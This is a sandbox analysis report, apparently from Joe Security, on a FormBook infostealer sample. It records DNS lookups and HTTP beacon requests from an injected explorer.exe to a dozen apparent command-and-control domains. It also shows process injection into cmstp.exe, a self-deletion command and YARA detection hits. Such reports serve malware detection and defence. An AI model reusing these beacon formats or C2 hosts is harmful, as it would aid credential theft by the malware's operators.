Apr 8, 2021 13:01:04.660743952 CEST | 8.8.8.8 | 192.168.2.3 | 0x1c05 | No error (0) | www.luxel01.com | | 118.27.122.19 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:01:10.182096958 CEST | 8.8.8.8 | 192.168.2.3 | 0x9af5 | No error (0) | www.orchidandiris.com | orchidandiris.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:01:10.182096958 CEST | 8.8.8.8 | 192.168.2.3 | 0x9af5 | No error (0) | orchidandiris.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:01:15.433754921 CEST | 8.8.8.8 | 192.168.2.3 | 0x1e15 | No error (0) | www.anadelalastra.art | ext-sq.squarespace.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:01:15.433754921 CEST | 8.8.8.8 | 192.168.2.3 | 0x1e15 | No error (0) | ext-sq.squarespace.com | | 198.185.159.144 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:01:15.433754921 CEST | 8.8.8.8 | 192.168.2.3 | 0x1e15 | No error (0) | ext-sq.squarespace.com | | 198.49.23.145 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:01:15.433754921 CEST | 8.8.8.8 | 192.168.2.3 | 0x1e15 | No error (0) | ext-sq.squarespace.com | | 198.185.159.145 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:01:15.433754921 CEST | 8.8.8.8 | 192.168.2.3 | 0x1e15 | No error (0) | ext-sq.squarespace.com | | 198.49.23.144 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:01:26.011487961 CEST | 8.8.8.8 | 192.168.2.3 | 0xb731 | No error (0) | www.ecomcourse.online | ecomcourse.online | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:01:26.011487961 CEST | 8.8.8.8 | 192.168.2.3 | 0xb731 | No error (0) | ecomcourse.online | | 184.168.131.241 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:01:32.419924974 CEST | 8.8.8.8 | 192.168.2.3 | 0xb135 | No error (0) | www.huongdandidong.com | | 108.186.210.142 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:01:37.914891005 CEST | 8.8.8.8 | 192.168.2.3 | 0xceae | No error (0) | www.muzhskoy-eskort.site | | 144.76.207.76 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:01:43.101130009 CEST | 8.8.8.8 | 192.168.2.3 | 0x72a2 | No error (0) | www.simplyhealrhcareplans.com | | 199.59.242.153 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:01:48.380568981 CEST | 8.8.8.8 | 192.168.2.3 | 0x157c | Name error (3) | www.opusleaf.com | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 13:01:53.510649920 CEST | 8.8.8.8 | 192.168.2.3 | 0xefdf | No error (0) | www.socialunified.com | HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:01:53.510649920 CEST | 8.8.8.8 | 192.168.2.3 | 0xefdf | No error (0) | HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | | 3.223.115.185 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:01:58.843024969 CEST | 8.8.8.8 | 192.168.2.3 | 0xc268 | Server failure (2) | www.myboardinghome.com | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 13:02:04.030394077 CEST | 8.8.8.8 | 192.168.2.3 | 0x4492 | Name error (3) | www.seymor-law.com | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 13:02:09.082026958 CEST | 8.8.8.8 | 192.168.2.3 | 0x8a9f | No error (0) | www.lewishackney.com | lewishackney.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:02:09.082026958 CEST | 8.8.8.8 | 192.168.2.3 | 0x8a9f | No error (0) | lewishackney.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:02:14.369541883 CEST | 8.8.8.8 | 192.168.2.3 | 0xeeac | No error (0) | www.shopthen2.site | | 5.101.152.161 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:02:19.633713007 CEST | 8.8.8.8 | 192.168.2.3 | 0x9bc4 | No error (0) | www.kaashir.com | | 208.91.197.27 | A (IP address) | IN (0x0001)

                                                                        HTTP Request Dependency Graph

                                                                        • www.karizcustomizeme.com
                                                                        • www.luxel01.com
                                                                        • www.orchidandiris.com
                                                                        • www.anadelalastra.art
                                                                        • www.ecomcourse.online
                                                                        • www.huongdandidong.com
                                                                        • www.muzhskoy-eskort.site
                                                                        • www.simplyhealrhcareplans.com
                                                                        • www.socialunified.com
                                                                        • www.lewishackney.com
                                                                        • www.shopthen2.site

                                                                        HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49720 | 160.153.136.3 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 13:00:59.241127968 CEST | 1246 | OUT | GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=+apFroP1TjGnxXEe5oaGEFG1FIGlVaZA9Y5GRttzGQ4z+BPhxNKjikjP31UiUH/cC1Iy HTTP/1.1
                                                                        Host: www.karizcustomizeme.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
Apr 8, 2021 13:00:59.275954008 CEST | 1246 | IN | HTTP/1.1 302 Found
                                                                        Connection: close
                                                                        Pragma: no-cache
                                                                        cache-control: no-cache
                                                                        Location: /sqra/?lzul=wRDL7BohbLBLJV&NBZl=+apFroP1TjGnxXEe5oaGEFG1FIGlVaZA9Y5GRttzGQ4z+BPhxNKjikjP31UiUH/cC1Iy


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49722 | 118.27.122.19 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 13:01:04.899665117 CEST | 1249 | OUT | GET /sqra/?NBZl=l8gFWKa0VIasP4OX6UWILwSCtzkOc3V6oKupITn9HnPx0eDpBTl3az448bd8FGwLkJvi&lzul=wRDL7BohbLBLJV HTTP/1.1
                                                                        Host: www.luxel01.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
Apr 8, 2021 13:01:05.137732983 CEST | 1250 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Thu, 08 Apr 2021 11:01:05 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        Location: https://www.luxel01.com/sqra/?NBZl=l8gFWKa0VIasP4OX6UWILwSCtzkOc3V6oKupITn9HnPx0eDpBTl3az448bd8FGwLkJvi&lzul=wRDL7BohbLBLJV
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.3 | 49743 | 5.101.152.161 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 13:02:14.417071104 CEST | 5418 | OUT | GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=0hvqTGsG2LXykKa15oAG/2YmS9ez8HJt/56JneCT4XqEJpzhFqXtEbyiFIIf71vevGG9 HTTP/1.1
                                                                        Host: www.shopthen2.site
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
Apr 8, 2021 13:02:14.472712994 CEST | 5418 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx-reuseport/1.13.4
                                                                        Date: Thu, 08 Apr 2021 11:02:14 GMT
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Content-Length: 285
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 71 72 61 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 68 6f 70 74 68 65 6e 32 2e 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sqra/ was not found on this server.</p><hr><address>Apache/2.4.10 (Unix) Server at www.shopthen2.site Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.3 | 49745 | 160.153.136.3 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 13:02:25.046103954 CEST | 5430 | OUT | GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=+apFroP1TjGnxXEe5oaGEFG1FIGlVaZA9Y5GRttzGQ4z+BPhxNKjikjP31UiUH/cC1Iy HTTP/1.1
                                                                        Host: www.karizcustomizeme.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
Apr 8, 2021 13:02:25.084101915 CEST | 5430 | IN | HTTP/1.1 400 Bad Request
                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49724 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 13:01:10.195719004 CEST | 1254 | OUT | GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=zH8yL9FtafuknHUuv+0OAb189SbLD7IfmvNkOBi8bJNQNfTK09EYjoUTP6M+ilwbYPXy HTTP/1.1
                                                                        Host: www.orchidandiris.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 13:01:10.374289989 CEST | 1255 | IN | HTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Thu, 08 Apr 2021 11:01:10 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "606eb0b7-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        3 | 192.168.2.3 | 49725 | 198.185.159.144 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Apr 8, 2021 13:01:15.579214096 CEST | 1258 | OUT | GET /sqra/?NBZl=lD4TJk9xsMd0/PL293fidflTFReEfYiBAFO2d5wZtfSldQt+n1O6CAKQlGZxKl5sANQQ&lzul=wRDL7BohbLBLJV HTTP/1.1
                                                                        Host: www.anadelalastra.art
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 13:01:15.762191057 CEST | 1259 | IN | HTTP/1.1 400 Bad Request
                                                                        Cache-Control: no-cache, must-revalidate
                                                                        Content-Length: 77564
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Date: Thu, 08 Apr 2021 11:01:15 UTC
                                                                        Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                        Pragma: no-cache
                                                                        Server: Squarespace
                                                                        X-Contextid: QiQXTyH2/TdPoyy5I
                                                                        Connection: close
                                                                        Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        4 | 192.168.2.3 | 49727 | 184.168.131.241 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Apr 8, 2021 13:01:26.191338062 CEST | 1314 | OUT | GET /sqra/?NBZl=A685XXlO5s8wdT2GSl4VwObxhyaN1usH/ZDf3g436hkZTbYdTSv6UxS6ZdhF3LcC3Fcd&lzul=wRDL7BohbLBLJV HTTP/1.1
                                                                        Host: www.ecomcourse.online
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 13:01:26.698020935 CEST | 1314 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Server: nginx/1.16.1
                                                                        Date: Thu, 08 Apr 2021 11:01:26 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Location: http://www.udemy.com/course/ecom-dropshipping/?referralCode=A72F9D646A0B66840647
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        5 | 192.168.2.3 | 49731 | 108.186.210.142 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Apr 8, 2021 13:01:32.580770969 CEST | 1371 | OUT | GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=94GGx2Cs8EYqYWyk7qEtIIzRN3fkRhfUxg2Vtzz5w0QY/7xu41tS8mQoIQP3aceFOvfi HTTP/1.1
                                                                        Host: www.huongdandidong.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 13:01:32.746746063 CEST | 1371 | IN | HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Thu, 08 Apr 2021 10:59:41 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Data Ascii: 69<html><head><script type='text/javascript' src='/js/wwd.js'></script></head><body></script></body></html>0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        6 | 192.168.2.3 | 49737 | 144.76.207.76 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Apr 8, 2021 13:01:37.939346075 CEST | 5389 | OUT | GET /sqra/?NBZl=XY+ZErIRkQWtvrbZzW/Q2VqSgxI2oDXvZ0FX1dCtO5jFwgiNlKUf7p0wm51D3p8eN5aQ&lzul=wRDL7BohbLBLJV HTTP/1.1
                                                                        Host: www.muzhskoy-eskort.site
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        7 | 192.168.2.3 | 49738 | 199.59.242.153 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Apr 8, 2021 13:01:43.214939117 CEST | 5390 | OUT | GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK HTTP/1.1
                                                                        Host: www.simplyhealrhcareplans.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 13:01:43.326561928 CEST | 5391 | IN | HTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Thu, 08 Apr 2021 11:01:43 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_b89+lPyWjYN9+1Zxni+v+D9UpCJXk1dtxqTBtQwgoRWYYdonh2ztCrm4uICYDrm/6PgZmwfEMYmMBlTR9b4jKA==
                                                                        Data Ascii: ee4<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_b89+lPyWjYN9+1Zxni+v+D9UpCJXk1dtxqTBtQwgoRWYYdonh2ztCrm4uICYDrm/6PgZmwfEMYmMBlTR9b4jKA=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        8 | 192.168.2.3 | 49739 | 3.223.115.185 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Apr 8, 2021 13:01:53.613534927 CEST | 5397 | OUT | GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=nD+8EQ/dkrvxrfeXfZTM4uqVidyysXGGAQQPcyuh+D+qYnXcwF5fcGHppY2Ae0Rizhob HTTP/1.1
                                                                        Host: www.socialunified.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 13:01:53.714488029 CEST | 5397 | IN | HTTP/1.1 302 Found
                                                                        Cache-Control: private
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Location: https://www.hugedomains.com/domain_profile.cfm?d=socialunified&e=com
                                                                        Server: Microsoft-IIS/8.5
                                                                        X-Powered-By: ASP.NET
                                                                        Date: Thu, 08 Apr 2021 11:01:47 GMT
                                                                        Connection: close
                                                                        Content-Length: 189
                                                                        Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.hugedomains.com/domain_profile.cfm?d=socialunified&amp;e=com">here</a>.</h2></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        9 | 192.168.2.3 | 49741 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Apr 8, 2021 13:02:09.097908020 CEST | 5407 | OUT | GET /sqra/?NBZl=RvvWc34iJhU4aDVvCPxlJYXQghZKjT+0jz617RLPtVuesnMs5OzQh/fCAeZj/K6zv/Ow&lzul=wRDL7BohbLBLJV HTTP/1.1
                                                                        Host: www.lewishackney.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 13:02:09.276810884 CEST | 5410 | IN | HTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Thu, 08 Apr 2021 11:02:09 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "605db497-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Code Manipulations

                                                                        Statistics

                                                                        Behavior

                                                                        System Behavior

                                                                        General

                                                                        Start time: 13:00:12
                                                                        Start date: 08/04/2021
                                                                        Path: C:\Users\user\Desktop\LWlcpDjYIQ.exe
                                                                        Wow64 process (32bit): true
                                                                        Commandline: 'C:\Users\user\Desktop\LWlcpDjYIQ.exe'
                                                                        Imagebase: 0x400000
                                                                        File size: 206058 bytes
                                                                        MD5 hash: 91523F8D438585534D9466432CC4665D
                                                                        Has elevated privileges: true
                                                                        Has administrator privileges: true
                                                                        Programmed in: C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation: low

                                                                        General

                                                                        Start time: 13:00:13
                                                                        Start date: 08/04/2021
                                                                        Path: C:\Users\user\Desktop\LWlcpDjYIQ.exe
                                                                        Wow64 process (32bit): true
                                                                        Commandline: 'C:\Users\user\Desktop\LWlcpDjYIQ.exe'
                                                                        Imagebase: 0x400000
                                                                        File size: 206058 bytes
                                                                        MD5 hash: 91523F8D438585534D9466432CC4665D
                                                                        Has elevated privileges: true
                                                                        Has administrator privileges: true
                                                                        Programmed in: C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        General

                                                                        Start time:13:00:18
                                                                        Start date:08/04/2021
                                                                        Path:C:\Windows\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:
                                                                        Imagebase:0x7ff714890000
                                                                        File size:3933184 bytes
                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:13:00:32
                                                                        Start date:08/04/2021
                                                                        Path:C:\Windows\SysWOW64\cmstp.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\SysWOW64\cmstp.exe
                                                                        Imagebase:0x220000
                                                                        File size:82944 bytes
                                                                        MD5 hash:4833E65ED211C7F118D4A11E6FB58A09
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:moderate

                                                                        General

                                                                        Start time:13:00:36
                                                                        Start date:08/04/2021
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:/c del 'C:\Users\user\Desktop\LWlcpDjYIQ.exe'
                                                                        Imagebase:0x9d0000
                                                                        File size:232960 bytes
                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:13:00:37
                                                                        Start date:08/04/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6b2800000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Disassembly

                                                                        Code Analysis
